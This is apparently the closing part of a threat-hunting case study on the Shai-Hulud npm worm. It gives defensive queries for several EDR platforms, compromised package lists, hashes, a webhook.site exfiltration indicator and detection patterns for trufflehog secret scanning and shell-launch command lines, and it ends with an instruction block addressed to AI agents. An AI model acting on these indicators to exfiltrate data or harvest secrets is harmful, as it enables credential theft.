"swc-plugin-component-annotate@1.9.1",
"swc-plugin-component-annotate@1.9.2",
"tbssnch@1.0.2",
"teselagen-interval-tree@1.1.2",
"tg-client-query-builder@2.14.4",
"tg-client-query-builder@2.14.5",
"tg-redbird@1.3.1",
"tg-seq-gen@1.0.9",
"tg-seq-gen@1.0.10",
"thangved-react-grid@1.0.3",
"ts-gaussian@3.0.5",
"ts-gaussian@3.0.6",
"ts-imports@1.0.1",
"ts-imports@1.0.2",
"tvi-cli@0.1.5",
"ve-bamreader@0.2.6",
"ve-editor@1.0.1",
"verror-extra@6.0.1",
"voip-callkit@1.0.2",
"voip-callkit@1.0.3",
"wdio-web-reporter@0.1.3",
"yargs-help-output@5.0.3",
"yoo-styles@6.0.326",
"ansi-styles@6.2.2",
"debug@4.4.2",
"chalk@5.6.1",
"supports-color@10.2.1",
"strip-ansi@7.1.1",
"ansi-regex@6.2.1",
"wrap-ansi@9.0.1",
"color-convert@3.1.1",
"color-name@2.0.1",
"is-arrayish@0.3.3",
"slice-ansi@7.1.1",
"color@5.0.1",
"color-string@2.1.1",
"simple-swizzle@0.2.3",
"supports-hyperlinks@4.1.1",
"has-ansi@6.0.1",
"chalk-template@1.1.1",
"backslash@0.2.1",
"error-ex@1.3.3"
)
###HUNT03 - MAL-Domain01-Hunting
#######// Description: This query will check for Domain, DNS, Queryevents, Network Events, URL Infos in Mails and URL Click Events requesting suspicious Domains.
let domainList = dynamic(["webhook.site"]);
union
(
IdentityQueryEvents
| where QueryTarget has_any(domainList)
| project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
DeviceNetworkEvents
| where RemoteUrl has_any(domainList) or LocalIP has_any(domainList) or RemoteIP has_any(domainList)
| project Timestamp,DeviceName, InitiatingProcessAccountName ,Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents", InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessParentFileName
),
(
DeviceNetworkInfo
| extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
| mv-expand DnsAddresses, ConnectedNetworks
| where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
| project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
EmailUrlInfo
| where UrlDomain has_any(domainList)
| project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
UrlClickEvents
| where Url has_any(domainList)
| project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
###CIM-HUNT04 - C2 communication
//Find devices that may have communicated with
let domainList = dynamic(["webhook.site"]);
union
(
DnsEvents
| where QueryType has_any(domainList) or Name has_any(domainList)
//or QueryType matches regex @"^.*\.devtunnels\.ms$" or Name matches regex @"^.*\.devtunnels\.ms$"
| project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
IdentityQueryEvents
| where QueryTarget has_any(domainList)
//or QueryType matches regex @"^.*\.devtunnels\.ms$"
| project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
DeviceNetworkEvents
| where RemoteUrl has_any(domainList)
//or RemoteUrl matches regex @"^.*\.devtunnels\.ms$"
| project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
DeviceNetworkInfo
| extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
| mv-expand DnsAddresses, ConnectedNetworks
| where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
//or DnsAddresses matches regex @"^.*\.devtunnels\.ms$" or ConnectedNetworks .Name matches regex @"^.*\.devtunnels\.ms$"
| project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
VMConnection
| extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
| mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
| where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
//or RemoteDnsQuestions matches regex @"^.*\.devtunnels\.ms$" or RemoteDnsCanonicalNames matches regex @"^.*\.devtunnels\.ms$"
| project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
W3CIISLog
| where csHost has_any(domainList) or csReferer has_any(domainList)
//or csHost matches regex @"^.*\.devtunnels\.ms$" or csReferer matches regex @"^.*\.devtunnels\.ms$"
| project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
EmailUrlInfo
| where UrlDomain has_any(domainList)
//or UrlDomain matches regex @"^.*\.devtunnels\.ms$"
| project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
UrlClickEvents
| where Url has_any(domainList)
//or Url matches regex @"^.*\.devtunnels\.ms$"
| project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc
###CIM-HUNT05 - Files with known malicious hashes (file events)
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in (
"46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09",
"b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777",
"dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c",
"4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, action_file_name=FileName, FolderPath, SHA256
| order by Timestamp desc
###CIM-HUNT06 - Detect downloads or network requests to the webhook.site IOC
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has "webhook.site" and RemoteUrl has "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
| order by Timestamp desc
###CIM-HUNT07 - Detection of the malicious workflow filename (shai-hulud-workflow.yml)
DeviceFileEvents
| where Timestamp > ago(30d)
| where FileName == "shai-hulud-workflow.yml"
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, FolderPath, InitiatingProcessCommandLine
| order by Timestamp desc
###CIM-HUNT08 - Hunt for trufflehog use (process telemetry)
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has_cs "trufflehog" or FileName has_cs "trufflehog"
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc
###CIM-HUNT09 - Hunt for trufflehog use (process telemetry)
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has_all ("chmod", "+x", "trufflehog", "tinycolor", "node_modules", "node") or
ProcessCommandLine has_all ("chmod", "+x", "trufflehog") or
ProcessCommandLine has_all ("node", "bundle.js", "sh -c")
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc
```
### 6.4) Hunting Queries Palo Cortex XDR
```cpp
###HUNT01 - Description: Reports indicate only Linux+Mac is targeted due to an os.platform() check, ensure agent coverage on these devices
dataset = endpoints
| filter endpoint_status in (ENUM.CONNECTED, ENUM.DISCONNECTED)
| comp count() by platform
###HUNT02 - Description: Check for connections to any webhook.site domains in raw NGFW URL logs. Optional filter for specific URI observed in use by threat actor.
dataset = panw_ngfw_url_raw
| filter lowercase(url_domain) contains "webhook.site"
| alter susp_uri = if(uri contains "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7")
// Optional filter:
// | filter susp_uri = true
| fields url_domain, uri, susp_uri, *
###HUNT03 - Description: Check for connections to any webhook.site domains in XDR telemetry. Optional filter for specific URI observed in use by threat actor.
dataset = xdr_data
| filter event_type = STORY
| filter lowercase(dst_action_external_hostname) contains "webhook.site" or lowercase(dns_query_name) contains "webhook.site"
//| alter susp_uri = if(uri contains "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7")
//| fields agent_hostname, dst_action_external_hostname, dns_query_name, action_external_hostname, action_network_dns_domains
###HUNT04 - Description: Detect malicious YAML file
dataset = xdr_data
| filter event_type = FILE and action_file_name = "shai-hulud-workflow.yml" and agent_os_type in (ENUM.AGENT_OS_MAC, ENUM.AGENT_OS_LINUX)
| fields agent_hostname, actor_effective_username, action_file_name, action_file_path, actor_process_image_name, actor_process_command_line
###HUNT05 - Detects Trufflehog usage. Legitimate tool abused by threat actor for secrets discovery. False positives may occur if there is legitimate use.
dataset = xdr_data
| filter event_type = PROCESS and lowercase(action_process_image_command_line) contains "trufflehog"
| fields agent_hostname, actor_effective_username, actor_process_command_line, action_process_image_command_line
###HUNT06 - Description: Detect malicious bundle.js file
config case_sensitive = false
| dataset = xdr_data
| filter event_type = FILE and action_file_sha256 = "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"
| fields agent_hostname, action_file_name, action_file_path, event_type, event_sub_type, actor_process_image_name, actor_process_command_line
dataset = xdr_data
| filter event_type = FILE and action_file_name = "bundle.js" and agent_os_type in (ENUM.AGENT_OS_MAC, ENUM.AGENT_OS_LINUX)
| fields agent_hostname, actor_effective_username, action_file_name, action_file_path, actor_process_image_name, actor_process_command_line
###HUNT07 - VER2-Compromised Packages
// Hunt for recently compromised npm packages: https://www.ox.security/blog/npm-packages-compromised/ & https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again
dataset = xdr_data
//| filter event_type = PROCESS and lowercase(action_process_image_command_line) in
| filter event_type = FILE and lowercase(action_file_path) in
(
"@ahmedhfarag/ngx-perfect-scrollbar@20.0.20",
"@ahmedhfarag/ngx-virtual-scroller@4.0.4",
"@art-ws/common@2.0.28",
"@art-ws/config-eslint@2.0.4",
"@art-ws/config-eslint@2.0.5",
"@art-ws/config-ts@2.0.7",
"@art-ws/config-ts@2.0.8",
"@art-ws/db-context@2.0.24",
"@art-ws/di@2.0.28",
"@art-ws/di@2.0.32",
"@art-ws/di-node@2.0.13",
"@art-ws/eslint@1.0.5",
"@art-ws/eslint@1.0.6",
"@art-ws/fastify-http-server@2.0.24",
"@art-ws/fastify-http-server@2.0.27",
"@art-ws/http-server@2.0.21",
"@art-ws/http-server@2.0.25",
"@art-ws/openapi@0.1.9",
"@art-ws/openapi@0.1.12",
"@art-ws/package-base@1.0.5",
"@art-ws/package-base@1.0.6",
"@art-ws/prettier@1.0.5",
"@art-ws/prettier@1.0.6",
"@art-ws/slf@2.0.15",
"@art-ws/slf@2.0.22",
"@art-ws/ssl-info@1.0.9",
"@art-ws/ssl-info@1.0.10",
"@art-ws/web-app@1.0.3",
"@art-ws/web-app@1.0.4",
"@crowdstrike/commitlint@8.1.1",
"@crowdstrike/commitlint@8.1.2",
"@crowdstrike/falcon-shoelace@0.4.1",
"@crowdstrike/falcon-shoelace@0.4.2",
"@crowdstrike/foundry-js@0.19.1",
"@crowdstrike/foundry-js@0.19.2",
"@crowdstrike/glide-core@0.34.2",
"@crowdstrike/glide-core@0.34.3",
"@crowdstrike/logscale-dashboard@1.205.1",
"@crowdstrike/logscale-dashboard@1.205.2",
"@crowdstrike/logscale-file-editor@1.205.1",
"@crowdstrike/logscale-file-editor@1.205.2",
"@crowdstrike/logscale-parser-edit@1.205.1",
"@crowdstrike/logscale-parser-edit@1.205.2",
"@crowdstrike/logscale-search@1.205.1",
"@crowdstrike/logscale-search@1.205.2",
"@crowdstrike/tailwind-toucan-base@5.0.1",
"@crowdstrike/tailwind-toucan-base@5.0.2",
"@ctrl/deluge@7.2.1",
"@ctrl/deluge@7.2.2",
"@ctrl/golang-template@1.4.2",
"@ctrl/golang-template@1.4.3",
"@ctrl/magnet-link@4.0.3",
"@ctrl/magnet-link@4.0.4",
"@ctrl/ngx-codemirror@7.0.1",
"@ctrl/ngx-codemirror@7.0.2",
"@ctrl/ngx-csv@6.0.1",
"@ctrl/ngx-csv@6.0.2",
"@ctrl/ngx-emoji-mart@9.2.1",
"@ctrl/ngx-emoji-mart@9.2.2",
"@ctrl/ngx-rightclick@4.0.1",
"@ctrl/ngx-rightclick@4.0.2",
"@ctrl/qbittorrent@9.7.1",
"@ctrl/qbittorrent@9.7.2",
"@ctrl/react-adsense@2.0.1",
"@ctrl/react-adsense@2.0.2",
"@ctrl/shared-torrent@6.3.1",
"@ctrl/shared-torrent@6.3.2",
"@ctrl/tinycolor@4.1.1",
"@ctrl/tinycolor@4.1.2",
"@ctrl/torrent-file@4.1.1",
"@ctrl/torrent-file@4.1.2",
"@ctrl/transmission@7.3.1",
"@ctrl/ts-base32@4.0.1",
"@ctrl/ts-base32@4.0.2",
"@hestjs/core@0.2.1",
"@hestjs/cqrs@0.1.6",
"@hestjs/demo@0.1.2",
"@hestjs/eslint-config@0.1.2",
"@hestjs/logger@0.1.6",
"@hestjs/scalar@0.1.7",
"@hestjs/validation@0.1.6",
"@nativescript-community/arraybuffers@1.1.6",
"@nativescript-community/arraybuffers@1.1.7",
"@nativescript-community/arraybuffers@1.1.8",
"@nativescript-community/gesturehandler@2.0.35",
"@nativescript-community/perms@3.0.5",
"@nativescript-community/perms@3.0.6",
"@nativescript-community/perms@3.0.7",
"@nativescript-community/perms@3.0.8",
"@nativescript-community/sqlite@3.5.2",
"@nativescript-community/sqlite@3.5.3",
"@nativescript-community/sqlite@3.5.4",
"@nativescript-community/sqlite@3.5.5",
"@nativescript-community/text@1.6.9",
"@nativescript-community/text@1.6.10",
"@nativescript-community/text@1.6.11",
"@nativescript-community/text@1.6.12",
"@nativescript-community/typeorm@0.2.30",
"@nativescript-community/typeorm@0.2.31",
"@nativescript-community/typeorm@0.2.32",
"@nativescript-community/typeorm@0.2.33",
"@nativescript-community/ui-collectionview@6.0.6",
"@nativescript-community/ui-document-picker@1.1.27",
"@nativescript-community/ui-document-picker@1.1.28",
"@nativescript-community/ui-drawer@0.1.30",
"@nativescript-community/ui-image@4.5.6",
"@nativescript-community/ui-label@1.3.35",
"@nativescript-community/ui-label@1.3.36",
"@nativescript-community/ui-label@1.3.37",
"@nativescript-community/ui-material-bottom-navigation@7.2.72",
"@nativescript-community/ui-material-bottom-navigation@7.2.73",
"@nativescript-community/ui-material-bottom-navigation@7.2.74",
"@nativescript-community/ui-material-bottom-navigation@7.2.75",
"@nativescript-community/ui-material-bottomsheet@7.2.72",
"@nativescript-community/ui-material-core@7.2.72",
"@nativescript-community/ui-material-core@7.2.73",
"@nativescript-community/ui-material-core@7.2.74",
"@nativescript-community/ui-material-core@7.2.75",
"@nativescript-community/ui-material-core-tabs@7.2.72",
"@nativescript-community/ui-material-core-tabs@7.2.73",
"@nativescript-community/ui-material-core-tabs@7.2.74",
"@nativescript-community/ui-material-core-tabs@7.2.75",
"@nativescript-community/ui-material-ripple@7.2.72",
"@nativescript-community/ui-material-ripple@7.2.73",
"@nativescript-community/ui-material-ripple@7.2.74",
"@nativescript-community/ui-material-ripple@7.2.75",
"@nativescript-community/ui-material-tabs@7.2.72",
"@nativescript-community/ui-material-tabs@7.2.73",
"@nativescript-community/ui-material-tabs@7.2.74",
"@nativescript-community/ui-material-tabs@7.2.75",
"@nativescript-community/ui-pager@14.1.36",
"@nativescript-community/ui-pager@14.1.37",
"@nativescript-community/ui-pager@14.1.38",
"@nativescript-community/ui-pulltorefresh@2.5.4",
"@nativescript-community/ui-pulltorefresh@2.5.5",
"@nativescript-community/ui-pulltorefresh@2.5.6",
"@nativescript-community/ui-pulltorefresh@2.5.7",
"@nexe/config-manager@0.1.1",
"@nexe/eslint-config@0.1.1",
"@nexe/logger@0.1.3",
"@nstudio/angular@20.0.4",
"@nstudio/angular@20.0.5",
"@nstudio/angular@20.0.6",
"@nstudio/focus@20.0.4",
"@nstudio/focus@20.0.5",
"@nstudio/focus@20.0.6",
"@nstudio/nativescript-checkbox@2.0.6",
"@nstudio/nativescript-checkbox@2.0.7",
"@nstudio/nativescript-checkbox@2.0.8",
"@nstudio/nativescript-checkbox@2.0.9",
"@nstudio/nativescript-loading-indicator@5.0.1",
"@nstudio/nativescript-loading-indicator@5.0.2",
"@nstudio/nativescript-loading-indicator@5.0.3",
"@nstudio/nativescript-loading-indicator@5.0.4",
"@nstudio/ui-collectionview@5.1.11",
"@nstudio/ui-collectionview@5.1.12",
"@nstudio/ui-collectionview@5.1.13",
"@nstudio/ui-collectionview@5.1.14",
"@nstudio/web@20.0.4",
"@nstudio/web-angular@20.0.4",
"@nstudio/xplat@20.0.5",
"@nstudio/xplat@20.0.6",
"@nstudio/xplat@20.0.7",
"@nstudio/xplat-utils@20.0.5",
"@nstudio/xplat-utils@20.0.6",
"@nstudio/xplat-utils@20.0.7",
"@operato/board@9.0.36",
"@operato/board@9.0.37",
"@operato/board@9.0.38",
"@operato/board@9.0.39",
"@operato/board@9.0.40",
"@operato/board@9.0.41",
"@operato/board@9.0.42",
"@operato/board@9.0.43",
"@operato/board@9.0.44",
"@operato/board@9.0.45",
"@operato/board@9.0.46",
"@operato/data-grist@9.0.29",
"@operato/data-grist@9.0.35",
"@operato/data-grist@9.0.36",
"@operato/data-grist@9.0.37",
"@operato/graphql@9.0.22",
"@operato/graphql@9.0.35",
"@operato/graphql@9.0.36",
"@operato/graphql@9.0.37",
"@operato/graphql@9.0.38",
"@operato/graphql@9.0.39",
"@operato/graphql@9.0.40",
"@operato/graphql@9.0.41",
"@operato/graphql@9.0.42",
"@operato/graphql@9.0.43",
"@operato/graphql@9.0.44",
"@operato/graphql@9.0.45",
"@operato/graphql@9.0.46",
"@operato/headroom@9.0.2",
"@operato/headroom@9.0.35",
"@operato/headroom@9.0.36",
"@operato/headroom@9.0.37",
"@operato/help@9.0.35",
"@operato/help@9.0.36",
"@operato/help@9.0.37",
"@operato/help@9.0.38",
"@operato/help@9.0.39",
"@operato/help@9.0.40",
"@operato/help@9.0.41",
"@operato/help@9.0.42",
"@operato/help@9.0.43",
"@operato/help@9.0.44",
"@operato/help@9.0.45",
"@operato/help@9.0.46",
"@operato/i18n@9.0.35",
"@operato/i18n@9.0.36",
"@operato/i18n@9.0.37",
"@operato/input@9.0.27",
"@operato/input@9.0.35",
"@operato/input@9.0.36",
"@operato/input@9.0.37",
"@operato/input@9.0.38",
"@operato/input@9.0.39",
"@operato/input@9.0.40",
"@operato/input@9.0.41",
"@operato/input@9.0.42",
"@operato/input@9.0.43",
"@operato/input@9.0.44",
"@operato/input@9.0.45",
"@operato/input@9.0.46",
"@operato/layout@9.0.35",
"@operato/layout@9.0.36",
"@operato/layout@9.0.37",
"@operato/popup@9.0.22",
"@operato/popup@9.0.35",
"@operato/popup@9.0.36",
"@operato/popup@9.0.37",
"@operato/popup@9.0.38",
"@operato/popup@9.0.39",
"@operato/popup@9.0.40",
"@operato/popup@9.0.41",
"@operato/popup@9.0.42",
"@operato/popup@9.0.43",
"@operato/popup@9.0.44",
"@operato/popup@9.0.45",
"@operato/popup@9.0.46",
"@operato/pull-to-refresh@9.0.36",
"@operato/pull-to-refresh@9.0.37",
"@operato/pull-to-refresh@9.0.38",
"@operato/pull-to-refresh@9.0.39",
"@operato/pull-to-refresh@9.0.40",
"@operato/pull-to-refresh@9.0.41",
"@operato/pull-to-refresh@9.0.42",
"@operato/shell@9.0.22",
"@operato/shell@9.0.35",
"@operato/shell@9.0.36",
"@operato/shell@9.0.37",
"@operato/shell@9.0.38",
"@operato/shell@9.0.39",
"@operato/styles@9.0.2",
"@operato/styles@9.0.35",
"@operato/styles@9.0.36",
"@operato/styles@9.0.37",
"@operato/utils@9.0.22",
"@operato/utils@9.0.35",
"@operato/utils@9.0.36",
"@operato/utils@9.0.37",
"@operato/utils@9.0.38",
"@operato/utils@9.0.39",
"@operato/utils@9.0.40",
"@operato/utils@9.0.41",
"@operato/utils@9.0.42",
"@operato/utils@9.0.43",
"@operato/utils@9.0.44",
"@operato/utils@9.0.45",
"@operato/utils@9.0.46",
"@teselagen/bounce-loader@0.3.16",
"@teselagen/bounce-loader@0.3.17",
"@teselagen/liquibase-tools@0.4.1",
"@teselagen/range-utils@0.3.14",
"@teselagen/range-utils@0.3.15",
"@teselagen/react-list@0.8.19",
"@teselagen/react-list@0.8.20",
"@teselagen/react-table@6.10.19",
"@thangved/callback-window@1.1.4",
"@things-factory/attachment-base@9.0.43",
"@things-factory/attachment-base@9.0.44",
"@things-factory/attachment-base@9.0.45",
"@things-factory/attachment-base@9.0.46",
"@things-factory/attachment-base@9.0.47",
"@things-factory/attachment-base@9.0.48",
"@things-factory/attachment-base@9.0.49",
"@things-factory/attachment-base@9.0.50",
"@things-factory/auth-base@9.0.43",
"@things-factory/auth-base@9.0.44",
"@things-factory/auth-base@9.0.45",
"@things-factory/email-base@9.0.42",
"@things-factory/email-base@9.0.43",
"@things-factory/email-base@9.0.44",
"@things-factory/email-base@9.0.45",
"@things-factory/email-base@9.0.46",
"@things-factory/email-base@9.0.47",
"@things-factory/email-base@9.0.48",
"@things-factory/email-base@9.0.49",
"@things-factory/email-base@9.0.50",
"@things-factory/email-base@9.0.51",
"@things-factory/email-base@9.0.52",
"@things-factory/email-base@9.0.53",
"@things-factory/email-base@9.0.54",
"@things-factory/env@9.0.42",
"@things-factory/env@9.0.43",
"@things-factory/env@9.0.44",
"@things-factory/env@9.0.45",
"@things-factory/integration-base@9.0.43",
"@things-factory/integration-base@9.0.44",
"@things-factory/integration-base@9.0.45",
"@things-factory/integration-marketplace@9.0.43",
"@things-factory/integration-marketplace@9.0.44",
"@things-factory/integration-marketplace@9.0.45",
"@things-factory/shell@9.0.43",
"@things-factory/shell@9.0.44",
"@things-factory/shell@9.0.45",
"@tnf-dev/api@1.0.8",
"@tnf-dev/core@1.0.8",
"@tnf-dev/js@1.0.8",
"@tnf-dev/mui@1.0.8",
"@tnf-dev/react@1.0.8",
"@ui-ux-gang/devextreme-angular-rpk@24.1.7",
"@yoobic/design-system@6.5.17",
"@yoobic/jpeg-camera-es6@1.0.13",
"@yoobic/yobi@8.7.53",
"airchief@0.3.1",
"airpilot@0.8.8",
"angulartics2@14.1.1",
"angulartics2@14.1.2",
"browser-webdriver-downloader@3.0.8",
"capacitor-notificationhandler@0.0.2",
"capacitor-notificationhandler@0.0.3",
"capacitor-plugin-healthapp@0.0.2",
"capacitor-plugin-healthapp@0.0.3",
"capacitor-plugin-ihealth@1.1.8",
"capacitor-plugin-ihealth@1.1.9",
"capacitor-plugin-vonage@1.0.2",
"capacitor-plugin-vonage@1.0.3",
"capacitorandroidpermissions@0.0.4",
"capacitorandroidpermissions@0.0.5",
"config-cordova@0.8.5",
"cordova-plugin-voxeet2@1.0.24",
"cordova-voxeet@1.0.32",
"create-hest-app@0.1.9",
"db-evo@1.1.4",
"db-evo@1.1.5",
"devextreme-angular-rpk@21.2.8",
"ember-browser-services@5.0.2",
"ember-browser-services@5.0.3",
"ember-headless-form@1.1.2",
"ember-headless-form@1.1.3",
"ember-headless-form-yup@1.0.1",
"ember-headless-table@2.1.5",
"ember-headless-table@2.1.6",
"ember-url-hash-polyfill@1.0.12",
"ember-url-hash-polyfill@1.0.13",
"ember-velcro@2.2.1",
"ember-velcro@2.2.2",
"encounter-playground@0.0.2",
"encounter-playground@0.0.3",
"encounter-playground@0.0.4",
"encounter-playground@0.0.5",
"eslint-config-crowdstrike@11.0.2",
"eslint-config-crowdstrike@11.0.3",
"eslint-config-crowdstrike-node@4.0.3",
"eslint-config-crowdstrike-node@4.0.4",
"eslint-config-teselagen@6.1.7",
"globalize-rpk@1.7.4",
"graphql-sequelize-teselagen@5.3.8",
"html-to-base64-image@1.0.2",
"json-rules-engine-simplified@0.2.1",
"jumpgate@0.0.2",
"koa2-swagger-ui@5.11.1",
"koa2-swagger-ui@5.11.2",
"mcfly-semantic-release@1.3.1",
"mcp-knowledge-base@0.0.2",
"mcp-knowledge-graph@1.2.1",
"mobioffice-cli@1.0.3",
"monorepo-next@13.0.1",
"monorepo-next@13.0.2",
"mstate-angular@0.4.4",
"mstate-cli@0.4.7",
"mstate-dev-react@1.1.1",
"mstate-react@1.6.5",
"ng2-file-upload@7.0.2",
"ng2-file-upload@7.0.3",
"ng2-file-upload@8.0.1",
"ng2-file-upload@8.0.2",
"ng2-file-upload@8.0.3",
"ng2-file-upload@9.0.1",
"ngx-bootstrap@18.1.4",
"ngx-bootstrap@19.0.3",
"ngx-bootstrap@19.0.4",
"ngx-bootstrap@20.0.3",
"ngx-bootstrap@20.0.4",
"ngx-bootstrap@20.0.5",
"ngx-color@10.0.1",
"ngx-color@10.0.2",
"ngx-toastr@19.0.1",
"ngx-toastr@19.0.2",
"ngx-trend@8.0.1",
"ngx-ws@1.1.5",
"ngx-ws@1.1.6",
"oradm-to-gql@35.0.14",
"oradm-to-gql@35.0.15",
"oradm-to-sqlz@1.1.2",
"ove-auto-annotate@0.0.9",
"pm2-gelf-json@1.0.4",
"pm2-gelf-json@1.0.5",
"printjs-rpk@1.6.1",
"react-complaint-image@0.0.32",
"react-jsonschema-form-conditionals@0.3.18",
"remark-preset-lint-crowdstrike@4.0.1",
"remark-preset-lint-crowdstrike@4.0.2",
"rxnt-authentication@0.0.3",
"rxnt-authentication@0.0.4",
"rxnt-authentication@0.0.5",
"rxnt-authentication@0.0.6",
"rxnt-healthchecks-nestjs@1.0.2",
"rxnt-healthchecks-nestjs@1.0.3",
"rxnt-healthchecks-nestjs@1.0.4",
"rxnt-healthchecks-nestjs@1.0.5",
"rxnt-kue@1.0.4",
"rxnt-kue@1.0.5",
"rxnt-kue@1.0.6",
"rxnt-kue@1.0.7",
"swc-plugin-component-annotate@1.9.1",
"swc-plugin-component-annotate@1.9.2",
"tbssnch@1.0.2",
"teselagen-interval-tree@1.1.2",
"tg-client-query-builder@2.14.4",
"tg-client-query-builder@2.14.5",
"tg-redbird@1.3.1",
"tg-seq-gen@1.0.9",
"tg-seq-gen@1.0.10",
"thangved-react-grid@1.0.3",
"ts-gaussian@3.0.5",
"ts-gaussian@3.0.6",
"ts-imports@1.0.1",
"ts-imports@1.0.2",
"tvi-cli@0.1.5",
"ve-bamreader@0.2.6",
"ve-editor@1.0.1",
"verror-extra@6.0.1",
"voip-callkit@1.0.2",
"voip-callkit@1.0.3",
"wdio-web-reporter@0.1.3",
"yargs-help-output@5.0.3",
"yoo-styles@6.0.326",
"ansi-styles@6.2.2",
"debug@4.4.2",
"chalk@5.6.1",
"supports-color@10.2.1",
"strip-ansi@7.1.1",
"ansi-regex@6.2.1",
"wrap-ansi@9.0.1",
"color-convert@3.1.1",
"color-name@2.0.1",
"is-arrayish@0.3.3",
"slice-ansi@7.1.1",
"color@5.0.1",
"color-string@2.1.1",
"simple-swizzle@0.2.3",
"supports-hyperlinks@4.1.1",
"has-ansi@6.0.1",
"chalk-template@1.1.1",
"backslash@0.2.1",
"error-ex@1.3.3"
)
```
### 6.5) Hunting Queries Tanium EDR
```cpp
###HUNT06 - Description: Detect malicious bundle.js file, trufflehog
Get Trace Executed Processes[unlimited,1758288047852|1758291646852,0,0,99,0,"","",".*(trufflehog).*","","",""] from all machines
Get Trace Executed Processes[unlimited,1758288047852|1758291646852,0,0,99,0,"","",".*(bundle.js).*","","",""] from all machines
Get Trace Executed Processes[unlimited,1758288047852|1758291646852,0,0,99,0,"","",".*(bundle\.js|trufflehog|tinycolor|node\_modules|chmod|sh -c).*","","",""] from all machines
###HUNT03 - MAL-Domain01-Hunting - Webhook Site
#######// Description: This query will check for Domain, DNS, Queryevents, Network Events, URL Infos in Mails and URL Click Events requesting suspicious Domains.
Get Trace DNS Queries[unlimited,1758287446087|1758291045087,1,0,100,0,"","",".*(webhook.site).*","",""] from all machines
```
## 7.) Conclusion and Learning for a Hunter Blue
* The NPM incident reveals Supply chain attacks are increasing in frequency. It is more important than ever to monitor third-party packages for malicious activity. Since malicious code can be hidden in many different ways, using runtime threat detection is critical to catching these attack
* its definitely necessary to check during Hunting or Initial Triage how Malware was staged
* -> showcasing how fruitful Compromise Assessment Hunting and **Time Line Analysis can be and should be used in such cases -> it is essential.**
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blog.hunter-blue.ch/cases/hunter-case-06-shai-hulud-worm-npm-package-supply-chain.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.